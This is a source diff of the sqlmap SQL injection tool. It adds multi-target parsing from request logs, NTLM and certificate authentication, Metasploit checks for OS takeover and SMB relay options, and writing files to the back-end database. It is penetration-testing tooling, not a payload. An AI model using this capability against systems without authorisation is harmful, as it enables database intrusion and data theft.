-                if not conf.googleDork and field == fields:
-                    dataToDumpFile(dumpFP, "\"%s\"" % column)
-                else:
-                    dataToDumpFile(dumpFP, "\"%s\"," % column)
+                if not conf.multipleTargets and field == fields:
+                    dataToDumpFile(dumpFP, "%s" % column)
+                elif not conf.multipleTargets:
+                    dataToDumpFile(dumpFP, "%s," % column)

                field += 1

        self.__write("|\n%s" % separator)
-        if not conf.googleDork:
+
+        if not conf.multipleTargets:
            dataToDumpFile(dumpFP, "\n")

        for i in range(count):
@@ -285,26 +328,26 @@ class Dump:
                    blank = " " * (maxlength - len(value))
                    self.__write("| %s%s" % (value, blank), n=False)

-                    if field == fields:
+                    if not conf.multipleTargets and field == fields:
                        dataToDumpFile(dumpFP, "\"%s\"" % value)
-                    else:
+                    elif not conf.multipleTargets:
                        dataToDumpFile(dumpFP, "\"%s\"," % value)

                    field += 1

            self.__write("|")
-            if not conf.googleDork:
+
+            if not conf.multipleTargets:
                dataToDumpFile(dumpFP, "\n")

        self.__write("%s\n" % separator)

-        if not conf.googleDork:
+        if not conf.multipleTargets:
            dataToDumpFile(dumpFP, "\n")
            dumpFP.close()

            logger.info("Table '%s.%s' dumped to CSV file '%s'" % (db, table, dumpFileName))

-
 # object to manage how to print the retrieved queries output to
 # standard output and sessions file
 dumper = Dump()
--- a/lib/core/exception.py
+++ b/lib/core/exception.py
@@ -5,8 +5,8 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -22,10 +22,8 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """

-
-
-import sys
-
+from lib.core.settings import PLATFORM
+from lib.core.settings import PYVERSION
 from lib.core.settings import VERSION
 from lib.core.settings import VERSION_STRING

@@ -33,74 +31,66 @@ from lib.core.settings import VERSION_STRING
 class sqlmapConnectionException(Exception):
    pass

-
 class sqlmapDataException(Exception):
    pass

-
 class sqlmapFilePathException(Exception):
    pass

-
 class sqlmapGenericException(Exception):
    pass

+class sqlmapMissingDependence(Exception):
+    pass

 class sqlmapMissingMandatoryOptionException(Exception):
    pass

+class sqlmapMissingPrivileges(Exception):
+    pass

 class sqlmapNoneDataException(Exception):
    pass

+class sqlmapNotVulnerableException(Exception):
+    pass

 class sqlmapRegExprException(Exception):
    pass

-
 class sqlmapSyntaxException(Exception):
    pass

+class sqlmapThreadException(Exception):
+    pass

 class sqlmapUndefinedMethod(Exception):
    pass

-
-class sqlmapMissingPrivileges(Exception):
-    pass
-
-
-class sqlmapNotVulnerableException(Exception):
-    pass
-
-
 class sqlmapUnsupportedDBMSException(Exception):
    pass

-
 class sqlmapUnsupportedFeatureException(Exception):
    pass

-
 class sqlmapValueException(Exception):
    pass

-
 def unhandledException():
    errMsg  = "unhandled exception in %s, please copy " % VERSION_STRING
    errMsg += "the command line and the following text and send by e-mail "
-    errMsg += "to bernardo.damele@gmail.com. I will fix it as soon as "
-    errMsg += "possible:\nsqlmap version: %s\n" % VERSION
-    errMsg += "Python version: %s\n" % sys.version.split()[0]
-    errMsg += "Operating system: %s" % sys.platform
+    errMsg += "to sqlmap-users@lists.sourceforge.net. The developer will "
+    errMsg += "fix it as soon as possible:\nsqlmap version: %s\n" % VERSION
+    errMsg += "Python version: %s\n" % PYVERSION
+    errMsg += "Operating system: %s" % PLATFORM
    return errMsg

-
 exceptionsTuple = (
                    sqlmapConnectionException,
                    sqlmapDataException,
                    sqlmapFilePathException,
                    sqlmapGenericException,
+                    sqlmapMissingDependence,
                    sqlmapMissingMandatoryOptionException,
                    sqlmapNoneDataException,
                    sqlmapRegExprException,
@@ -108,6 +98,7 @@ exceptionsTuple = (
                    sqlmapUndefinedMethod,
                    sqlmapMissingPrivileges,
                    sqlmapNotVulnerableException,
+                    sqlmapThreadException,
                    sqlmapUnsupportedDBMSException,
                    sqlmapUnsupportedFeatureException,
                    sqlmapValueException,
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -5,8 +5,8 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -22,21 +22,24 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """

-
-
 import cookielib
+import ctypes
+import difflib
 import logging
 import os
 import re
-import time
+import socket
 import urllib2
 import urlparse

+from ConfigParser import ConfigParser
+
+from lib.core.common import getFileType
+from lib.core.common import normalizePath
+from lib.core.common import ntToPosixSlashes
 from lib.core.common import parseTargetUrl
 from lib.core.common import paths
 from lib.core.common import randomRange
-from lib.core.common import randomStr
-from lib.core.common import readInput
 from lib.core.common import sanitizeStr
 from lib.core.data import conf
 from lib.core.data import kb
@@ -45,25 +48,32 @@ from lib.core.data import paths
 from lib.core.datatype import advancedDict
 from lib.core.exception import sqlmapFilePathException
 from lib.core.exception import sqlmapGenericException
+from lib.core.exception import sqlmapMissingDependence
+from lib.core.exception import sqlmapMissingMandatoryOptionException
+from lib.core.exception import sqlmapMissingPrivileges
 from lib.core.exception import sqlmapSyntaxException
 from lib.core.exception import sqlmapUnsupportedDBMSException
 from lib.core.optiondict import optDict
 from lib.core.settings import MSSQL_ALIASES
 from lib.core.settings import MYSQL_ALIASES
+from lib.core.settings import PGSQL_ALIASES
+from lib.core.settings import ORACLE_ALIASES
+from lib.core.settings import IS_WIN
+from lib.core.settings import PLATFORM
 from lib.core.settings import SITE
 from lib.core.settings import SUPPORTED_DBMS
+from lib.core.settings import SUPPORTED_OS
 from lib.core.settings import VERSION_STRING
 from lib.core.update import update
 from lib.parse.configfile import configFileParser
 from lib.parse.queriesfile import queriesParser
 from lib.request.proxy import ProxyHTTPSHandler
+from lib.request.certhandler import HTTPSCertAuthHandler
 from lib.utils.google import Google

-
 authHandler  = urllib2.BaseHandler()
 proxyHandler = urllib2.BaseHandler()

-
 def __urllib2Opener():
    """
    This function creates the urllib2 OpenerDirector.
@@ -75,11 +85,144 @@ def __urllib2Opener():
    debugMsg = "creating HTTP requests opener object"
    logger.debug(debugMsg)
    
+    if conf.dropSetCookie:
+        opener  = urllib2.build_opener(proxyHandler, authHandler)
+    else:
        conf.cj = cookielib.LWPCookieJar()
        opener  = urllib2.build_opener(proxyHandler, authHandler, urllib2.HTTPCookieProcessor(conf.cj))

    urllib2.install_opener(opener)

+def __feedTargetsDict(reqFile, addedTargetUrls):
+    fp = open(reqFile, "r")
+
+    fread = fp.read()
+    fread = fread.replace("\r", "")
+
+    reqResList = fread.split("======================================================")
+
+    port   = None
+    scheme = None
+
+    if conf.scope:
+        logger.info("using regular expression '%s' for filtering targets" % conf.scope)
+
+    for request in reqResList:
+        if scheme is None:
+            schemePort = re.search("\d\d[\:|\.]\d\d[\:|\.]\d\d\s+(http[\w]*)\:\/\/.*?\:([\d]+)", request, re.I)
+
+            if schemePort:
+                scheme = schemePort.group(1)
+                port   = schemePort.group(2)
+
+        if not re.search ("^[\n]*(GET|POST).*?\sHTTP\/", request, re.I):
+            continue
+
+        if re.search("^[\n]*(GET|POST).*?\.(gif|jpg|png)\sHTTP\/", request, re.I):
+            continue
+
+        getPostReq = False
+        url        = None
+        host       = None
+        method     = None
+        data       = None
+        cookie     = None
+        params     = False
+        lines      = request.split("\n")
+
+        for line in lines:
+            if len(line) == 0 or line == "\n":
+                continue
+
+            if line.startswith("GET ") or line.startswith("POST "):
+                if line.startswith("GET "):
+                    index = 4
+                else:
+                    index = 5
+
+                url    = line[index:line.index(" HTTP/")]
+                method = line[:index-1]
+
+                if "?" in line and "=" in line:
+                    params = True
+
+                getPostReq = True
+
+            # GET parameters
+            elif "?" in line and "=" in line and ": " not in line:
+                data   = line
+                params = True
+
+            # Cookie and Host headers
+            elif ": " in line:
+                key, value = line.split(": ", 1)
+
+                if key.lower() == "cookie":
+                    cookie = value
+                elif key.lower() == "host":
+                    host = value
+
+            # POST parameters
+            elif method is not None and method == "POST" and "=" in line:
+                data   = line
+                params = True
+
+        if conf.scope:
+            getPostReq &= re.search(conf.scope, host) is not None
+
+        if getPostReq and params:
+            if not url.startswith("http"):
+                url    = "%s://%s:%s%s" % (scheme or "http", host, port or "80", url)
+                scheme = None
+                port   = None
+
+            if not kb.targetUrls or url not in addedTargetUrls:
+                kb.targetUrls.add(( url, method, data, cookie ))
+                addedTargetUrls.add(url)
+
+def __setMultipleTargets():
+    """
+    Define a configuration parameter if we are running in multiple target
+    mode.
+    """
+
+    initialTargetsCount = len(kb.targetUrls)
+    addedTargetUrls = set()
+
+    if not conf.list:
+        return
+
+    debugMsg = "parsing targets list from '%s'" % conf.list
+    logger.debug(debugMsg)
+
+    if not os.path.exists(conf.list):
+        errMsg = "the specified list of targets does not exist"
+        raise sqlmapFilePathException, errMsg
+
+    if os.path.isfile(conf.list):
+        __feedTargetsDict(conf.list, addedTargetUrls)
+
+    elif os.path.isdir(conf.list):
+        files = os.listdir(conf.list)
+        files.sort()
+
+        for reqFile in files:
+            if not re.search("([\d]+)\-request", reqFile):
+                continue
+
+            __feedTargetsDict(os.path.join(conf.list, reqFile), addedTargetUrls)
+
+    else:
+        errMsg  = "the specified list of targets is not a file "
+        errMsg += "nor a directory"
+        raise sqlmapFilePathException, errMsg
+
+    updatedTargetsCount = len(kb.targetUrls)
+
+    if updatedTargetsCount > initialTargetsCount:
+        infoMsg  = "sqlmap parsed %d " % (updatedTargetsCount - initialTargetsCount)
+        infoMsg += "testable requests from the targets list"
+        logger.info(infoMsg)

 def __setGoogleDorking():
    """
@@ -109,7 +252,7 @@ def __setGoogleDorking():
        errMsg += "Google dork expression"
        raise sqlmapGenericException, errMsg

-    kb.targetUrls = googleObj.getTargetUrls()
+    googleObj.getTargetUrls()

    if kb.targetUrls:
        logMsg  = "sqlmap got %d results for your " % len(matches)
@@ -120,7 +263,7 @@ def __setGoogleDorking():
        else:
            logMsg += "%d " % len(kb.targetUrls)

-        logMsg += "of them are testable hosts"
+        logMsg += "of them are testable targets"
        logger.info(logMsg)
    else:
        errMsg  = "sqlmap got %d results " % len(matches)
@@ -128,10 +271,293 @@ def __setGoogleDorking():
        errMsg += "have GET parameters to test for SQL injection"
        raise sqlmapGenericException, errMsg

-
-def __setRemoteDBMS():
+def __setRequestFromFile():
    """
-    Checks and set the back-end DBMS option.
+    This function checks if the way to make a HTTP request is through supplied
+    textual file, parses it and saves the information into the knowledge base.
+    """
+
+    if not conf.requestFile:
+        return
+    
+    conf.requestFile = os.path.expanduser(conf.requestFile)
+    
+    infoMsg = "parsing HTTP request from '%s'" % conf.requestFile
+    logger.info(infoMsg)
+
+    if not os.path.isfile(conf.requestFile):
+        errMsg  = "the specified HTTP request file "
+        errMsg += "'%s' does not exist" % conf.requestFile
+        raise sqlmapFilePathException, errMsg
+    
+    fp = open(conf.requestFile, "r")
+    fread = fp.read()
+    fread = fread.replace("\r", "")
+    fp.close()
+    
+    lines = fread.split("\n")
+    
+    if len(lines) == 0:
+        errMsg  = "the specified HTTP request file "
+        errMsg += "'%s' has no content" % conf.requestFile
+        raise sqlmapFilePathException, errMsg
+    
+    if not (lines[0].upper().startswith("GET ") or lines[0].upper().startswith("POST ")):
+        errMsg =  "the specified HTTP request file "
+        errMsg += "doesn't start with GET or POST keyword"
+        raise sqlmapFilePathException, errMsg
+
+    
+    if lines[0].upper().startswith("GET "):
+        index = 4
+    else:
+        index = 5
+
+    if lines[0].upper().find(" HTTP/") == -1:
+        errMsg  = "the specified HTTP request file " 
+        errMsg += "has a syntax error at line: 1"
+        raise sqlmapFilePathException, errMsg
+        
+    host = None
+    headers = ""
+    page = lines[0][index:lines[0].index(" HTTP/")]
+    
+    if conf.method:
+        warnMsg  = "HTTP method previously set. overriding it with "
+        warnMsg += "the value supplied from the HTTP request file"
+        logger.warn(warnMsg)
+    conf.method = lines[0][:index-1]
+
+    for index in xrange(1, len(lines) - 1):
+        line = lines[index]
+        valid = True
+        
+        if len(line) == 0:
+            break
+        
+        headers += line + "\n"
+        
+        items = line.split(': ')
+        if len(items) != 2:
+            valid = False
+        else:
+            if items[0].upper() == "HOST":
+                host = items[1]
+                
+        if not valid:
+            errMsg  = "the specified HTTP request file" 
+            errMsg += "has a syntax error at line: %d" % (index + 1)
+            raise sqlmapFilePathException, errMsg
+    
+    if conf.headers and headers:
+        warnMsg  = "HTTP headers previously set. overriding it with "
+        warnMsg += "the value(s) supplied from the HTTP request file"
+        logger.warn(warnMsg)
+    conf.headers = headers.strip("\n")
+    
+    if fread.find("\n\n") != -1:
+        if conf.data:
+            warnMsg  = "HTTP POST data previously set. overriding it with "
+            warnMsg += "the value supplied from the HTTP request file"
+            logger.warn(warnMsg)
+        conf.data = fread[fread.index('\n\n')+2:].strip("\n")
+    
+    if conf.url:
+        warnMsg  = "target url previously set. overriding it with "
+        warnMsg += "the value supplied from the HTTP request file"
+        logger.warn(warnMsg)
+        
+    if host:
+        conf.url = "%s%s" % (host, page)
+    else:
+        errMsg  = "mandatory HTTP header HOST is missing in "
+        errMsg += "the HTTP request file"
+        raise sqlmapFilePathException, errMsg
+            
+def __setMetasploit():
+    if not conf.osPwn and not conf.osSmb and not conf.osBof:
+        return
+
+    debugMsg = "setting the takeover out-of-band functionality"
+    logger.debug(debugMsg)
+
+    msfEnvPathExists = False
+
+    if IS_WIN:
+        warnMsg  = "Metasploit's msfconsole and msfcli are not supported "
+        warnMsg += "on the native Windows Ruby interpreter. Please "
+        warnMsg += "install Metasploit, Python interpreter and sqlmap on "
+        warnMsg += "Cygwin or use Linux in VMWare to use sqlmap takeover "
+        warnMsg += "out-of-band features. sqlmap will now continue "
+        warnMsg += "without calling any takeover feature"
+        logger.warn(warnMsg)
+
+        conf.osPwn = None
+        conf.osSmb = None
+        conf.osBof = None
+
+        return
+
+    if conf.osSmb:
+        isAdmin = False
+
+        if "linux" in PLATFORM or "darwin" in PLATFORM:
+            isAdmin = os.geteuid()
+
+            if isinstance(isAdmin, (int, float, long)) and isAdmin == 0:
+                isAdmin = True
+
+        elif IS_WIN:
+            isAdmin = ctypes.windll.shell32.IsUserAnAdmin()
+
+            if isinstance(isAdmin, (int, float, long)) and isAdmin == 1:
+                isAdmin = True
+
+        else:
+            warnMsg  = "sqlmap is not able to check if you are running it "
+            warnMsg += "as an Administrator accout on this platform. "
+            warnMsg += "sqlmap will assume that you are an Administrator "
+            warnMsg += "which is mandatory for the SMB relay attack to "
+            warnMsg += "work properly"
+            logger.warn(warnMsg)
+
+            isAdmin = True
+
+        if isAdmin is not True:
+            errMsg  = "you need to run sqlmap as an Administrator/root "
+            errMsg += "user if you want to perform a SMB relay attack "
+            errMsg += "because it will need to listen on a user-specified "
+            errMsg += "SMB TCP port for incoming connection attempts"
+            raise sqlmapMissingPrivileges, errMsg
+
+    if conf.msfPath:
+        condition  = os.path.exists(normalizePath(conf.msfPath))
+        condition &= os.path.exists(normalizePath(os.path.join(conf.msfPath, "msfcli")))
+        condition &= os.path.exists(normalizePath(os.path.join(conf.msfPath, "msfconsole")))
+        condition &= os.path.exists(normalizePath(os.path.join(conf.msfPath, "msfencode")))
+        condition &= os.path.exists(normalizePath(os.path.join(conf.msfPath, "msfpayload")))
+
+        if condition:
+            debugMsg  = "provided Metasploit Framework 3 path "
+            debugMsg += "'%s' is valid" % conf.msfPath
+            logger.debug(debugMsg)
+
+            msfEnvPathExists = True
+        else:
+            warnMsg  = "the provided Metasploit Framework 3 path "
+            warnMsg += "'%s' is not valid. The cause could " % conf.msfPath
+            warnMsg += "be that the path does not exists or that one "
+            warnMsg += "or more of the needed Metasploit executables "
+            warnMsg += "within msfcli, msfconsole, msfencode and "
+            warnMsg += "msfpayload do not exist"
+            logger.warn(warnMsg)
+    else:
+        warnMsg  = "you did not provide the local path where Metasploit "
+        warnMsg += "Framework 3 is installed"
+        logger.warn(warnMsg)
+
+    if not msfEnvPathExists:
+        warnMsg  = "sqlmap is going to look for Metasploit Framework 3 "
+        warnMsg += "installation into the environment paths"
+        logger.warn(warnMsg)
+
+        envPaths = os.environ["PATH"]
+
+        if IS_WIN:
+            envPaths = envPaths.split(";")
+        else:
+            envPaths = envPaths.split(":")
+
+        for envPath in envPaths:
+            envPath    = envPath.replace(";", "")
+            condition  = os.path.exists(normalizePath(envPath))
+            condition &= os.path.exists(normalizePath(os.path.join(envPath, "msfcli")))
+            condition &= os.path.exists(normalizePath(os.path.join(envPath, "msfconsole")))
+            condition &= os.path.exists(normalizePath(os.path.join(envPath, "msfencode")))
+            condition &= os.path.exists(normalizePath(os.path.join(envPath, "msfpayload")))
+
+            if condition:
+                infoMsg  = "Metasploit Framework 3 has been found "
+                infoMsg += "installed in the '%s' path" % envPath
+                logger.info(infoMsg)
+
+                msfEnvPathExists = True
+                conf.msfPath     = envPath
+
+                break
+
+    if not msfEnvPathExists:
+        errMsg  = "unable to locate Metasploit Framework 3 installation. "
+        errMsg += "Get it from http://metasploit.com/framework/download/"
+        raise sqlmapFilePathException, errMsg
+
+def __setWriteFile():
+    if not conf.wFile:
+        return
+
+    debugMsg = "setting the write file functionality"
+    logger.debug(debugMsg)
+
+    if not os.path.exists(conf.wFile):
+        errMsg = "the provided local file '%s' does not exist" % conf.wFile
+        raise sqlmapFilePathException, errMsg
+
+    if not conf.dFile:
+        errMsg  = "you did not provide the back-end DBMS absolute path "
+        errMsg += "where you want to write the local file '%s'" % conf.wFile
+        raise sqlmapMissingMandatoryOptionException, errMsg
+
+    conf.wFileType = getFileType(conf.wFile)
+
+def __setUnionTech():
+    if conf.uTech is None:
+        conf.uTech = "NULL"
+
+        return
+
+    debugMsg = "setting the UNION query SQL injection detection technique"
+    logger.debug(debugMsg)
+
+    uTechOriginal = conf.uTech
+    conf.uTech    = conf.uTech.lower()
+
+    if conf.uTech and conf.uTech not in ( "null", "orderby" ):
+        infoMsg  = "resetting the UNION query detection technique to "
+        infoMsg += "'NULL', '%s' is not a valid technique" % uTechOriginal
+        logger.info(infoMsg)
+
+        conf.uTech = "NULL"
+
+    else:
+        debugMsg  = "setting UNION query detection technique to "
+        debugMsg += "'%s'" % uTechOriginal
+        logger.debug(debugMsg)
+
+def __setOS():
+    """
+    Force the back-end DBMS operating system option.
+    """
+
+    if not conf.os:
+        return
+
+    debugMsg = "forcing back-end DBMS operating system to user defined value"
+    logger.debug(debugMsg)
+
+    conf.os = conf.os.lower()
+
+    if conf.os not in SUPPORTED_OS:
+        errMsg  = "you provided an unsupported back-end DBMS operating "
+        errMsg += "system. The supported DBMS operating systems for OS "
+        errMsg += "and file system access are Linux and Windows. "
+        errMsg += "If you do not know the back-end DBMS underlying OS, "
+        errMsg += "do not provide it and sqlmap will fingerprint it for "
+        errMsg += "you."
+        raise sqlmapUnsupportedDBMSException, errMsg
+
+def __setDBMS():
+    """
+    Force the back-end DBMS option.
    """

    if not conf.dbms:
@@ -141,8 +567,10 @@ def __setRemoteDBMS():
    logger.debug(debugMsg)

    conf.dbms = conf.dbms.lower()
-    firstRegExp = "(%s|%s)" % ("|".join([alias for alias in MSSQL_ALIASES]),
-                               "|".join([alias for alias in MYSQL_ALIASES]))
+    firstRegExp = "(%s|%s|%s|%s)" % ("|".join([alias for alias in MSSQL_ALIASES]),
+                                     "|".join([alias for alias in MYSQL_ALIASES]),
+                                     "|".join([alias for alias in PGSQL_ALIASES]),
+                                     "|".join([alias for alias in ORACLE_ALIASES]))
    dbmsRegExp = re.search("%s ([\d\.]+)" % firstRegExp, conf.dbms)

    if dbmsRegExp:
@@ -157,12 +585,10 @@ def __setRemoteDBMS():
        errMsg += "fingerprint it for you."
        raise sqlmapUnsupportedDBMSException, errMsg

-
 def __setThreads():
-    if conf.threads <= 0:
+    if not isinstance(conf.threads, int) or conf.threads <= 0:
        conf.threads = 1

-
 def __setHTTPProxy():
    """
    Check and set the HTTP proxy to pass by all HTTP requests.
@@ -171,10 +597,10 @@ def __setHTTPProxy():
    global proxyHandler

    if not conf.proxy: 
+        if conf.hostname in ('localhost', '127.0.0.1') or conf.ignoreProxy:
+            proxyHandler = urllib2.ProxyHandler({})
        return

-    parseTargetUrl()
-
    debugMsg = "setting the HTTP proxy to pass by all HTTP requests"
    logger.debug(debugMsg)

@@ -186,7 +612,10 @@ def __setHTTPProxy():
    __port         = None

    if len(__hostnamePort) == 2:
+        try:
            __port = int(__hostnamePort[1])
+        except:
+            pass #drops into the next check block

    if not __scheme or not __hostname or not __port:
        errMsg = "proxy value must be in format 'http://url:port'"
@@ -196,51 +625,50 @@ def __setHTTPProxy():

    # Workaround for http://bugs.python.org/issue1424152 (urllib/urllib2:
    # HTTPS over (Squid) Proxy fails) as long as HTTP over SSL requests
-    # can't be tunneled over an HTTP proxy natively by Python urllib2
-    # standard library
+    # can't be tunneled over an HTTP proxy natively by Python (<= 2.5)
+    # urllib2 standard library
    if conf.scheme == "https":
        proxyHandler = ProxyHTTPSHandler(__proxyString)
    else:
        proxyHandler = urllib2.ProxyHandler({"http": __proxyString})

-
 def __setHTTPAuthentication():
    """
-    Check and set the HTTP authentication method (Basic or Digest),
-    username and password to perform HTTP requests with.
+    Check and set the HTTP(s) authentication method (Basic, Digest, NTLM or Certificate),
+    username and password for first three methods, or key file and certification file for
+    certificate authentication
    """

    global authHandler

-    if not conf.aType and not conf.aCred:
+    if not conf.aType and not conf.aCred and not conf.aCert:
        return

    elif conf.aType and not conf.aCred:
-        errMsg  = "you specified the HTTP Authentication type, but "
+        errMsg  = "you specified the HTTP authentication type, but "
        errMsg += "did not provide the credentials"
        raise sqlmapSyntaxException, errMsg

    elif not conf.aType and conf.aCred:
-        errMsg  = "you specified the HTTP Authentication credentials, "
+        errMsg  = "you specified the HTTP authentication credentials, "
        errMsg += "but did not provide the type"
        raise sqlmapSyntaxException, errMsg

-    parseTargetUrl()
-
-    debugMsg = "setting the HTTP Authentication type and credentials"
+    if not conf.aCert:
+        debugMsg = "setting the HTTP authentication type and credentials"
        logger.debug(debugMsg)
    
        aTypeLower = conf.aType.lower()
    
-    if aTypeLower not in ( "basic", "digest" ):
-        errMsg  = "HTTP Authentication type value must be "
-        errMsg += "Basic or Digest"
+        if aTypeLower not in ( "basic", "digest", "ntlm" ):
+            errMsg  = "HTTP authentication type value must be "
+            errMsg += "Basic, Digest or NTLM"
            raise sqlmapSyntaxException, errMsg
    
        aCredRegExp = re.search("^(.*?)\:(.*?)$", conf.aCred)
    
        if not aCredRegExp:
-        errMsg  = "HTTP Authentication credentials value must be "
+            errMsg  = "HTTP authentication credentials value must be "
            errMsg += "in format username:password"
            raise sqlmapSyntaxException, errMsg
    
@@ -252,9 +680,41 @@ def __setHTTPAuthentication():
    
        if aTypeLower == "basic":
            authHandler = urllib2.HTTPBasicAuthHandler(passwordMgr)
+    
        elif aTypeLower == "digest":
            authHandler = urllib2.HTTPDigestAuthHandler(passwordMgr)
    
+        elif aTypeLower == "ntlm":
+            try:
+                from ntlm import HTTPNtlmAuthHandler
+            except ImportError, _:
+                errMsg  = "sqlmap requires Python NTLM third-party library "
+                errMsg += "in order to authenticate via NTLM, "
+                errMsg += "http://code.google.com/p/python-ntlm/"
+                raise sqlmapMissingDependence, errMsg
+    
+            authHandler = HTTPNtlmAuthHandler.HTTPNtlmAuthHandler(passwordMgr)
+    else:
+        debugMsg = "setting the HTTP(s) authentication certificate"
+        logger.debug(debugMsg)
+        
+        aCertRegExp = re.search("^(.+?),\s*(.+?)$", conf.aCert)
+    
+        if not aCertRegExp:
+            errMsg  = "HTTP authentication certificate option "
+            errMsg += "must be in format key_file,cert_file"
+            raise sqlmapSyntaxException, errMsg
+    
+        #os.path.expanduser for support of paths with ~
+        key_file = os.path.expanduser(aCertRegExp.group(1))
+        cert_file = os.path.expanduser(aCertRegExp.group(2))
+        
+        for file in (key_file, cert_file):
+            if not os.path.exists(file):
+                errMsg  = "File '%s' doesn't exist" % file
+                raise sqlmapSyntaxException, errMsg
+        
+        authHandler = HTTPSCertAuthHandler(key_file, cert_file)

 def __setHTTPMethod():
    """
@@ -262,9 +722,6 @@ def __setHTTPMethod():
    """

    if conf.method:
-        debugMsg = "setting the HTTP method to perform HTTP requests through"
-        logger.debug(debugMsg)
-
        conf.method = conf.method.upper()

        if conf.method not in ("GET", "POST"):
@@ -277,6 +734,29 @@ def __setHTTPMethod():
    else:
        conf.method = "GET"

+    debugMsg = "setting the HTTP method to %s" % conf.method
+    logger.debug(debugMsg)
+
+def __setHTTPExtraHeaders():
+    if conf.hostname:
+        conf.httpHeaders.append(("Host", conf.hostname))
+
+    if conf.headers:
+        debugMsg = "setting extra HTTP headers"
+        logger.debug(debugMsg)
+
+        conf.headers = conf.headers.split("\n")
+
+        for headerValue in conf.headers:
+            header, value = headerValue.split(": ")
+
+            if header and value:
+                conf.httpHeaders.append((header, value))
+
+    else:
+        conf.httpHeaders.append(("Accept", "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"))
+        conf.httpHeaders.append(("Accept-Language", "en-us,en;q=0.5"))
+        conf.httpHeaders.append(("Accept-Charset", "ISO-8859-15,utf-8;q=0.7,*;q=0.7"))

 def __defaultHTTPUserAgent():
    """
@@ -286,6 +766,12 @@ def __defaultHTTPUserAgent():

    return "%s (%s)" % (VERSION_STRING, SITE)

+    # Firefox 3 running on Ubuntu 9.04 updated at April 2009
+    #return "Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.9) Gecko/2009042113 Ubuntu/9.04 (jaunty) Firefox/3.0.9"
+
+    # Internet Explorer 7.0 running on Windows 2003 Service Pack 2 english
+    # updated at March 2009
+    #return "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"

 def __setHTTPUserAgent():
    """
@@ -350,7 +836,6 @@ def __setHTTPUserAgent():
    logMsg += "file '%s': %s" % (conf.userAgentsFile, __userAgent)
    logger.info(logMsg)

-
 def __setHTTPReferer():
    """
    Set the HTTP Referer
@@ -362,7 +847,6 @@ def __setHTTPReferer():

        conf.httpHeaders.append(("Referer", conf.referer))

-
 def __setHTTPCookies():
    """
    Set the HTTP Cookie header
@@ -375,6 +859,27 @@ def __setHTTPCookies():
        conf.httpHeaders.append(("Connection", "Keep-Alive"))
        conf.httpHeaders.append(("Cookie", conf.cookie))

+def __setHTTPTimeout():
+    """
+    Set the HTTP timeout
+    """
+
+    if conf.timeout:
+        debugMsg = "setting the HTTP timeout"
+        logger.debug(debugMsg)
+
+        conf.timeout = float(conf.timeout)
+
+        if conf.timeout < 3.0:
+            warnMsg  = "the minimum HTTP timeout is 3 seconds, sqlmap "
+            warnMsg += "will going to reset it"
+            logger.warn(warnMsg)
+
+            conf.timeout = 3.0
+    else:
+        conf.timeout = 30.0
+
+    socket.setdefaulttimeout(conf.timeout)

 def __cleanupOptions():
    """
@@ -402,6 +907,26 @@ def __cleanupOptions():
    if conf.user:
        conf.user = conf.user.replace(" ", "")

+    if conf.delay:
+        conf.delay = float(conf.delay)
+
+    if conf.rFile:
+        conf.rFile = normalizePath(ntToPosixSlashes(conf.rFile))
+
+    if conf.wFile:
+        conf.wFile = normalizePath(ntToPosixSlashes(conf.wFile))
+
+    if conf.dFile:
+        conf.dFile = normalizePath(ntToPosixSlashes(conf.dFile))
+
+    if conf.msfPath:
+        conf.msfPath = normalizePath(ntToPosixSlashes(conf.msfPath))
+
+    if conf.tmpPath:
+        conf.tmpPath = normalizePath(ntToPosixSlashes(conf.tmpPath))
+
+    if conf.googleDork or conf.list:
+        conf.multipleTargets = True

 def __setConfAttributes():
    """
@@ -418,15 +943,27 @@ def __setConfAttributes():
    conf.httpHeaders     = []
    conf.hostname        = None
    conf.loggedToOut     = None
+    conf.matchRatio      = None
+    conf.md5hash         = None
+    conf.multipleTargets = False
    conf.outputPath      = None
    conf.paramDict       = {}
    conf.parameters      = {}
+    conf.paramFalseCond  = False
+    conf.paramNegative   = False
    conf.path            = None
    conf.port            = None
+    conf.progressWidth   = 54
+    conf.retriesCount    = 0
    conf.scheme          = None
+    #conf.seqMatcher      = difflib.SequenceMatcher(lambda x: x in " \t")
+    conf.seqMatcher      = difflib.SequenceMatcher(None)
+    conf.seqLock         = None
    conf.sessionFP       = None
    conf.start           = True
-
+    conf.threadContinue  = True
+    conf.threadException = False
+    conf.wFileType       = None

 def __setKnowledgeBaseAttributes():
    """
@@ -438,23 +975,40 @@ def __setKnowledgeBaseAttributes():
    logger.debug(debugMsg)

    kb.absFilePaths   = set()
-    kb.defaultResult  = None
-    kb.docRoot        = None
+    kb.bannerFp       = advancedDict()
+    kb.data           = advancedDict()
+
+    # Basic back-end DBMS fingerprint
    kb.dbms           = None
    kb.dbmsDetected   = False
-    kb.dbmsVersion    = None
+
+    # Active (extensive) back-end DBMS fingerprint
+    kb.dbmsVersion    = [ "Unknown" ]
+
+    kb.dep            = None
+    kb.docRoot        = None
